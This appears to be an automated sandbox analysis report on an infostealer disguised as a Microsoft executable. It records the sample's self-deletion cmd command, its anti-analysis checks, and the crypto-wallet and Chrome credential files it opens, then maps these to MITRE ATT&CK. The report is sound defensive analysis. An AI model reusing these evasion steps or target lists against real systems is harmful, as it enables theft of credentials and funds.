Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00412560 push eax; ret

Source: sqlite3[1].dll.2.dr	Static PE information: section name: /4
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /19
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /35
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /51
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /63
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /77
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /89
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /102
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /113
Source: sqlite3[1].dll.2.dr	Static PE information: section name: /124
Source: sqlite3.dll.2.dr	Static PE information: section name: /4
Source: sqlite3.dll.2.dr	Static PE information: section name: /19
Source: sqlite3.dll.2.dr	Static PE information: section name: /35
Source: sqlite3.dll.2.dr	Static PE information: section name: /51
Source: sqlite3.dll.2.dr	Static PE information: section name: /63
Source: sqlite3.dll.2.dr	Static PE information: section name: /77
Source: sqlite3.dll.2.dr	Static PE information: section name: /89
Source: sqlite3.dll.2.dr	Static PE information: section name: /102
Source: sqlite3.dll.2.dr	Static PE information: section name: /113
Source: sqlite3.dll.2.dr	Static PE information: section name: /124

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405E20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Persistence and Installation Behavior:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

File created: C:\ProgramData\sqlite3.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File created: C:\ProgramData\sqlite3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_0040B0B0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405740

Source: C:\Windows\SysWOW64\timeout.exe TID: 5652

Thread sleep count: 42 > 30

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sqlite3[1].dll

Jump to dropped file

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405740

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00401000 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408820 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00407560 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_004011F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408650 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00408410 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Code function: 2_2_00404DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,FindNextFileA,FindClose,

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\

Source: WerFault.exe, 0000000B.00000002.726935016.0000000004FD0000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW

Anti Debugging:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00403C80 VirtualProtect ?,00000004,00000100,00000000,?,?,00000104

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405E20 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00409850 GetProcessHeap,RtlAllocateHeap,memset,GetTimeZoneInformation,wsprintfA,

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_0040ADE0 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions

Show sources

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.1.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.15.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 0.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.af0000.0.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')
Source: 2.2.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.1.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u0036B2E13A8.cs	Reference to suspicious API methods: ('D18D907C', 'VirtualProtect@kernel32')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/A9B2B86E.cs	Reference to suspicious API methods: ('075920FD', 'LoadLibraryEx@kernel32.dll')
Source: 2.0.Microsoft.ApplicationInsights.PersistenceChannel.exe.590000.0.unpack, u00341CE8079/u00310F343D7.cs	Reference to suspicious API methods: ('6F31A696', 'GetProcAddress@kernel32')

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout /t 5 & del /f /q 'C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe' & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5

Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: Microsoft.ApplicationInsights.PersistenceChannel.exe, 00000000.00000000.678687075.0000000001880000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.dll VolumeInformation

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,LocalFree,

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00410E40 GetLocalTime,SystemTimeToFileTime,

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00409850 GetProcessHeap,RtlAllocateHeap,memset,GetTimeZoneInformation,wsprintfA,

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_00405840 memset,GetVersionExA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrlen,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe

Code function: 2_2_004097B0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

Stealing of Sensitive Information:

Tries to steal Crypto Currency Wallets

Show sources

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Microsoft.ApplicationInsights.PersistenceChannel.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Source: Yara match

File source: 00000002.00000002.684293295.0000000000BAB000.00000004.00000020.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API11	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools11	OS Credential Dumping1	System Time Discovery2	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information11	Input Capture1	Account Discovery1	Remote Desktop Protocol	Data from Local System2	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
